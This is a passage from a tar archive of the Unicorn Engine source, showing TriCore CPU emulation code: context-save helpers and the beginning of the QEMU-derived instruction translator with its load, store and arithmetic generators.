12) + ((env->FCX & MASK_FCX_FCXO) << 6); /* new_FCX = M(EA, word); */ new_FCX = cpu_ldl_data(env, ea); /* M(EA, 16 * word) = {PCXI, PSW, A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]}; */ save_context_lower(env, ea); /* PCXI.PCPN = ICR.CCPN; */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* PCXI.PIE = ICR.IE; */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.UL = 0; */ env->PCXI &= ~MASK_PCXI_UL; /* PCXI[19: 0] = FCX[19: 0]; */ env->PCXI = (env->PCXI & 0xfff00000) + (env->FCX & 0xfffff); /* FCX[19: 0] = new_FCX[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (new_FCX & 0xfffff); /* if (tmp_FCX == LCX) trap(FCD);*/ if (tmp_FCX == env->LCX) { /* FCD trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCD, GETPC()); } } void helper_svucx(CPUTriCoreState *env) { target_ulong tmp_FCX; target_ulong ea; target_ulong new_FCX; if (env->FCX == 0) { /* FCU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCU, GETPC()); } /* tmp_FCX = FCX; */ tmp_FCX = env->FCX; /* EA = {FCX.FCXS, 6'b0, FCX.FCXO, 6'b0}; */ ea = ((env->FCX & MASK_FCX_FCXS) << 12) + ((env->FCX & MASK_FCX_FCXO) << 6); /* new_FCX = M(EA, word); */ new_FCX = cpu_ldl_data(env, ea); /* M(EA, 16 * word) = {PCXI, PSW, A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]}; */ save_context_upper(env, ea); /* PCXI.PCPN = ICR.CCPN; */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* PCXI.PIE = ICR.IE; */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.UL = 1; */ env->PCXI |= MASK_PCXI_UL; /* PCXI[19: 0] = FCX[19: 0]; */ env->PCXI = (env->PCXI & 0xfff00000) + (env->FCX & 0xfffff); /* FCX[19: 0] = new_FCX[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (new_FCX & 0xfffff); /* if (tmp_FCX == LCX) trap(FCD);*/ if (tmp_FCX == env->LCX) { /* FCD trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCD, GETPC()); } } void helper_rslcx(CPUTriCoreState *env) { target_ulong ea; target_ulong new_PCXI; /* if (PCXI[19: 0] == 0) then trap(CSU); */ if ((env->PCXI & 0xfffff) == 0) { /* CSU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CSU, GETPC()); } /* if (PCXI.UL == 1) then trap(CTYP); */ if ((env->PCXI & MASK_PCXI_UL) != 0) { /* CTYP trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CTYP, GETPC()); } /* EA = {PCXI.PCXS, 6'b0, PCXI.PCXO, 6'b0}; */ ea = ((env->PCXI & MASK_PCXI_PCXS) << 12) + ((env->PCXI & MASK_PCXI_PCXO) << 6); /* {new_PCXI, A[11], A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]} = M(EA, 16 * word); */ restore_context_lower(env, ea, &env->gpr_a[11], &new_PCXI); /* M(EA, word) = FCX; */ cpu_stl_data(env, ea, env->FCX); /* M(EA, word) = FCX; */ cpu_stl_data(env, ea, env->FCX); /* FCX[19: 0] = PCXI[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (env->PCXI & 0x000fffff); /* PCXI = new_PCXI; */ env->PCXI = new_PCXI; } void helper_psw_write(CPUTriCoreState *env, uint32_t arg) { psw_write(env, arg); } uint32_t helper_psw_read(CPUTriCoreState *env) { return psw_read(env); } void helper_uc_tricore_exit(CPUTriCoreState *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_HLT; cs->halted = 1; cpu_loop_exit(cs); }��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/translate.c�������������������������������������������������������0000664�0000000�0000000�00001274215�14675241067�0021265�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TriCore emulation for qemu: main translation routines. * * Copyright (c) 2013-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "tricore-opcodes.h" #include "exec/translator.h" #include "exec/gen-icount.h" /* * Unicorn: Special disas state for exiting in the middle of tb. */ #define DISAS_UC_EXIT DISAS_TARGET_6 static const char *regnames_a[] = { "a0" , "a1" , "a2" , "a3" , "a4" , "a5" , "a6" , "a7" , "a8" , "a9" , "sp" , "a11" , "a12" , "a13" , "a14" , "a15", }; static const char *regnames_d[] = { "d0" , "d1" , "d2" , "d3" , "d4" , "d5" , "d6" , "d7" , "d8" , "d9" , "d10" , "d11" , "d12" , "d13" , "d14" , "d15", }; typedef struct DisasContext { DisasContextBase base; CPUTriCoreState *env; target_ulong pc; // CCOp cc_op; /* Current CC operation */ target_ulong pc_succ_insn; uint32_t opcode; /* Routine used to access memory */ int mem_idx; uint32_t hflags, saved_hflags; uint64_t features; // Unicorn struct uc_struct *uc; } DisasContext; static int has_feature(DisasContext *ctx, int feature) { return (ctx->features & (1ULL << feature)) != 0; } enum { MODE_LL = 0, MODE_LU = 1, MODE_UL = 2, MODE_UU = 3, }; /* * Functions to generate micro-ops */ /* Makros for generating helpers */ #define gen_helper_1arg(tcg_ctx, name, arg) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define GEN_HELPER_LL(tcg_ctx, name, ret, arg0, arg1, n) do { \ TCGv arg00 = tcg_temp_new(tcg_ctx); \ TCGv arg01 = tcg_temp_new(tcg_ctx); \ TCGv arg11 = tcg_temp_new(tcg_ctx); \ tcg_gen_sari_tl(tcg_ctx, arg00, arg0, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg01, arg0); \ tcg_gen_ext16s_tl(tcg_ctx, arg11, arg1); \ gen_helper_##name(tcg_ctx, ret, arg00, arg01, arg11, arg11, n); \ tcg_temp_free(tcg_ctx, arg00); \ tcg_temp_free(tcg_ctx, arg01); \ tcg_temp_free(tcg_ctx, arg11); \ } while (0) #define GEN_HELPER_LU(tcg_ctx, name, ret, arg0, arg1, n) do { \ TCGv arg00 = tcg_temp_new(tcg_ctx); \ TCGv arg01 = tcg_temp_new(tcg_ctx); \ TCGv arg10 = tcg_temp_new(tcg_ctx); \ TCGv arg11 = tcg_temp_new(tcg_ctx); \ tcg_gen_sari_tl(tcg_ctx, arg00, arg0, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg01, arg0); \ tcg_gen_sari_tl(tcg_ctx, arg11, arg1, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg10, arg1); \ gen_helper_##name(tcg_ctx, ret, arg00, arg01, arg10, arg11, n); \ tcg_temp_free(tcg_ctx, arg00); \ tcg_temp_free(tcg_ctx, arg01); \ tcg_temp_free(tcg_ctx, arg10); \ tcg_temp_free(tcg_ctx, arg11); \ } while (0) #define GEN_HELPER_UL(tcg_ctx, name, ret, arg0, arg1, n) do { \ TCGv arg00 = tcg_temp_new(tcg_ctx); \ TCGv arg01 = tcg_temp_new(tcg_ctx); \ TCGv arg10 = tcg_temp_new(tcg_ctx); \ TCGv arg11 = tcg_temp_new(tcg_ctx); \ tcg_gen_sari_tl(tcg_ctx, arg00, arg0, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg01, arg0); \ tcg_gen_sari_tl(tcg_ctx, arg10, arg1, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg11, arg1); \ gen_helper_##name(tcg_ctx, ret, arg00, arg01, arg10, arg11, n); \ tcg_temp_free(tcg_ctx, arg00); \ tcg_temp_free(tcg_ctx, arg01); \ tcg_temp_free(tcg_ctx, arg10); \ tcg_temp_free(tcg_ctx, arg11); \ } while (0) #define GEN_HELPER_UU(tcg_ctx, name, ret, arg0, arg1, n) do { \ TCGv arg00 = tcg_temp_new(tcg_ctx); \ TCGv arg01 = tcg_temp_new(tcg_ctx); \ TCGv arg11 = tcg_temp_new(tcg_ctx); \ tcg_gen_sari_tl(tcg_ctx, arg01, arg0, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg00, arg0); \ tcg_gen_sari_tl(tcg_ctx, arg11, arg1, 16); \ gen_helper_##name(tcg_ctx, ret, arg00, arg01, arg11, arg11, n); \ tcg_temp_free(tcg_ctx, arg00); \ tcg_temp_free(tcg_ctx, arg01); \ tcg_temp_free(tcg_ctx, arg11); \ } while (0) #define GEN_HELPER_RRR(tcg_ctx, name, rl, rh, al1, ah1, arg2) do { \ TCGv_i64 ret = tcg_temp_new_i64(tcg_ctx); \ TCGv_i64 arg1 = tcg_temp_new_i64(tcg_ctx); \ \ tcg_gen_concat_i32_i64(tcg_ctx, arg1, al1, ah1); \ gen_helper_##name(tcg_ctx, ret, arg1, arg2); \ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, ret); \ \ tcg_temp_free_i64(tcg_ctx, ret); \ tcg_temp_free_i64(tcg_ctx, arg1); \ } while (0) #define GEN_HELPER_RR(tcg_ctx, name, rl, rh, arg1, arg2) do { \ TCGv_i64 ret = tcg_temp_new_i64(tcg_ctx); \ \ gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, arg2); \ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, ret); \ \ tcg_temp_free_i64(tcg_ctx, ret); \ } while (0) #define EA_ABS_FORMAT(con) (((con & 0x3C000) << 14) + (con & 0x3FFF)) #define EA_B_ABSOLUT(con) (((offset & 0xf00000) << 8) | \ ((offset & 0x0fffff) << 1)) /* For two 32-bit registers used a 64-bit register, the first registernumber needs to be even. Otherwise we trap. */ static inline void generate_trap(DisasContext *ctx, int class, int tin); #define CHECK_REG_PAIR(reg) do { \ if (reg & 0x1) { \ generate_trap(ctx, TRAPC_INSN_ERR, TIN2_OPD); \ } \ } while (0) /* Functions for load/save to/from memory */ static inline void gen_offset_ld(DisasContext *ctx, TCGv r1, TCGv r2, int16_t con, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, r2, con); tcg_gen_qemu_ld_tl(tcg_ctx, r1, temp, ctx->mem_idx, mop); tcg_temp_free(tcg_ctx, temp); } static inline void gen_offset_st(DisasContext *ctx, TCGv r1, TCGv r2, int16_t con, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, r2, con); tcg_gen_qemu_st_tl(tcg_ctx, r1, temp, ctx->mem_idx, mop); tcg_temp_free(tcg_ctx, temp); } static void gen_st_2regs_64(DisasContext *ctx, TCGv rh, TCGv rl, TCGv address) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp, rl, rh); // tcg_gen_qemu_st_i64(tcg_ctx, temp, address, ctx->mem_idx, MO_LEUQ); tcg_gen_qemu_st_i64(tcg_ctx, temp, address, ctx->mem_idx, MO_LE | MO_Q); tcg_temp_free_i64(tcg_ctx, temp); } static void gen_offset_st_2regs(DisasContext *ctx, TCGv rh, TCGv rl, TCGv base, int16_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, base, con); gen_st_2regs_64(ctx, rh, rl, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_ld_2regs_64(DisasContext *ctx, TCGv rh, TCGv rl, TCGv address) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); // tcg_gen_qemu_ld_i64(tcg_ctx, temp, address, ctx->mem_idx, MO_LEUQ); tcg_gen_qemu_ld_i64(tcg_ctx, temp, address, ctx->mem_idx, MO_LE | MO_Q); /* write back to two 32 bit regs */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp); tcg_temp_free_i64(tcg_ctx, temp); } static void gen_offset_ld_2regs(DisasContext *ctx, TCGv rh, TCGv rl, TCGv base, int16_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, base, con); gen_ld_2regs_64(ctx, rh, rl, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_st_preincr(DisasContext *ctx, TCGv r1, TCGv r2, int16_t off, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, r2, off); tcg_gen_qemu_st_tl(tcg_ctx, r1, temp, ctx->mem_idx, mop); tcg_gen_mov_tl(tcg_ctx, r2, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_ld_preincr(DisasContext *ctx, TCGv r1, TCGv r2, int16_t off, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, r2, off); tcg_gen_qemu_ld_tl(tcg_ctx, r1, temp, ctx->mem_idx, mop); tcg_gen_mov_tl(tcg_ctx, r2, temp); tcg_temp_free(tcg_ctx, temp); } /* M(EA, word) = (M(EA, word) & ~E[a][63:32]) | (E[a][31:0] & E[a][63:32]); */ static void gen_ldmst(DisasContext *ctx, int ereg, TCGv ea) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(ereg); /* temp = (M(EA, word) */ tcg_gen_qemu_ld_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); /* temp = temp & ~E[a][63:32]) */ tcg_gen_andc_tl(tcg_ctx, temp, temp, tcg_ctx->cpu_gpr_d[ereg+1]); /* temp2 = (E[a][31:0] & E[a][63:32]); */ tcg_gen_and_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[ereg], tcg_ctx->cpu_gpr_d[ereg+1]); /* temp = temp | temp2; */ tcg_gen_or_tl(tcg_ctx, temp, temp, temp2); /* M(EA, word) = temp; */ tcg_gen_qemu_st_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* tmp = M(EA, word); M(EA, word) = D[a]; D[a] = tmp[31:0];*/ static void gen_swap(DisasContext *ctx, int reg, TCGv ea) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[reg], ea, ctx->mem_idx, MO_LEUL); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[reg], temp); tcg_temp_free(tcg_ctx, temp); } static void gen_cmpswap(DisasContext *ctx, int reg, TCGv ea) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, temp2, tcg_ctx->cpu_gpr_d[reg+1], temp, tcg_ctx->cpu_gpr_d[reg], temp); tcg_gen_qemu_st_tl(tcg_ctx, temp2, ea, ctx->mem_idx, MO_LEUL); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[reg], temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void gen_swapmsk(DisasContext *ctx, int reg, TCGv ea) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); tcg_gen_and_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[reg], tcg_ctx->cpu_gpr_d[reg+1]); tcg_gen_andc_tl(tcg_ctx, temp3, temp, tcg_ctx->cpu_gpr_d[reg+1]); tcg_gen_or_tl(tcg_ctx, temp2, temp2, temp3); tcg_gen_qemu_st_tl(tcg_ctx, temp2, ea, ctx->mem_idx, MO_LEUL); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[reg], temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); } /* We generate loads and store to core special function register (csfr) through the function gen_mfcr and gen_mtcr. To handle access permissions, we use 3 makros R, A and E, which allow read-only, all and endinit protected access. These makros also specify in which ISA version the csfr was introduced. */ #define R(ADDRESS, REG, FEATURE) \ case ADDRESS: \ if (has_feature(ctx, FEATURE)) { \ tcg_gen_ld_tl(tcg_ctx, ret, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, REG)); \ } \ break; #define A(ADDRESS, REG, FEATURE) R(ADDRESS, REG, FEATURE) #define E(ADDRESS, REG, FEATURE) R(ADDRESS, REG, FEATURE) static inline void gen_mfcr(DisasContext *ctx, TCGv ret, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* since we're caching PSW make this a special case */ if (offset == 0xfe04) { gen_helper_psw_read(tcg_ctx, ret, tcg_ctx->cpu_env); } else { switch (offset) { #include "csfr.def" } } } #undef R #undef A #undef E #define R(ADDRESS, REG, FEATURE) /* don't gen writes to read-only reg, since no execption occurs */ #define A(ADDRESS, REG, FEATURE) R(ADDRESS, REG, FEATURE) \ case ADDRESS: \ if (has_feature(ctx, FEATURE)) { \ tcg_gen_st_tl(tcg_ctx, r1, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, REG)); \ } \ break; /* Endinit protected registers TODO: Since the endinit bit is in a register of a not yet implemented watchdog device, we handle endinit protected registers like all-access registers for now. */ #define E(ADDRESS, REG, FEATURE) A(ADDRESS, REG, FEATURE) static inline void gen_mtcr(DisasContext *ctx, TCGv r1, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if ((ctx->hflags & TRICORE_HFLAG_KUU) == TRICORE_HFLAG_SM) { /* since we're caching PSW make this a special case */ if (offset == 0xfe04) { gen_helper_psw_write(tcg_ctx, tcg_ctx->cpu_env, r1); } else { switch (offset) { #include "csfr.def" } } } else { /* generate privilege trap */ } } /* Functions for arithmetic instructions */ static inline void gen_add_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); /* Addition and set V/SV bits */ tcg_gen_add_tl(tcg_ctx, result, r1, r2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, t0, r1, r2); tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t0); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, t0); } static inline void gen_add64_d(DisasContext *ctx, TCGv_i64 ret, TCGv_i64 r1, TCGv_i64 r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 result = tcg_temp_new_i64(tcg_ctx); tcg_gen_add_i64(tcg_ctx, result, r1, r2); /* calc v bit */ tcg_gen_xor_i64(tcg_ctx, t1, result, r1); tcg_gen_xor_i64(tcg_ctx, t0, r1, r2); tcg_gen_andc_i64(tcg_ctx, t1, t1, t0); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* calc AV/SAV bits */ tcg_gen_extrh_i64_i32(tcg_ctx, temp, result); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, temp); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_i64(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static inline void gen_addsub64_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, void(*op1)(TCGContext*, TCGv, TCGv, TCGv), void(*op2)(TCGContext*, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv temp4 = tcg_temp_new(tcg_ctx); (*op1)(tcg_ctx, temp, r1_low, r2); /* calc V0 bit */ tcg_gen_xor_tl(tcg_ctx, temp2, temp, r1_low); tcg_gen_xor_tl(tcg_ctx, temp3, r1_low, r2); if (op1 == tcg_gen_add_tl) { tcg_gen_andc_tl(tcg_ctx, temp2, temp2, temp3); } else { tcg_gen_and_tl(tcg_ctx, temp2, temp2, temp3); } (*op2)(tcg_ctx, temp3, r1_high, r3); /* calc V1 bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, temp3, r1_high); tcg_gen_xor_tl(tcg_ctx, temp4, r1_high, r3); if (op2 == tcg_gen_add_tl) { tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp4); } else { tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp4); } /* combine V0/V1 bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp2); /* calc sv bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* write result */ tcg_gen_mov_tl(tcg_ctx, ret_low, temp); tcg_gen_mov_tl(tcg_ctx, ret_high, temp3); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, ret_low, ret_low); tcg_gen_xor_tl(tcg_ctx, temp, temp, ret_low); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, ret_high); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free(tcg_ctx, temp4); } /* ret = r2 + (r1 * r3); */ static inline void gen_madd32_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t1, r1); tcg_gen_ext_i32_i64(tcg_ctx, t2, r2); tcg_gen_ext_i32_i64(tcg_ctx, t3, r3); tcg_gen_mul_i64(tcg_ctx, t1, t1, t3); tcg_gen_add_i64(tcg_ctx, t1, t2, t1); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t1); /* calc V t1 > 0x7fffffff */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_GT, t3, t1, 0x7fffffffLL); /* t1 < -0x80000000 */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LT, t2, t1, -0x80000000LL); tcg_gen_or_i64(tcg_ctx, t2, t2, t3); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_maddi32_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_madd32_d(ctx, ret, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_madd64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); TCGv t4 = tcg_temp_new(tcg_ctx); tcg_gen_muls2_tl(tcg_ctx, t1, t2, r1, r3); /* only the add can overflow */ tcg_gen_add2_tl(tcg_ctx, t3, t4, r2_low, r2_high, t1, t2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, t4, r2_high); tcg_gen_xor_tl(tcg_ctx, t1, r2_high, t2); tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t1); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, t4, t4); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, t4, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back the result */ tcg_gen_mov_tl(tcg_ctx, ret_low, t3); 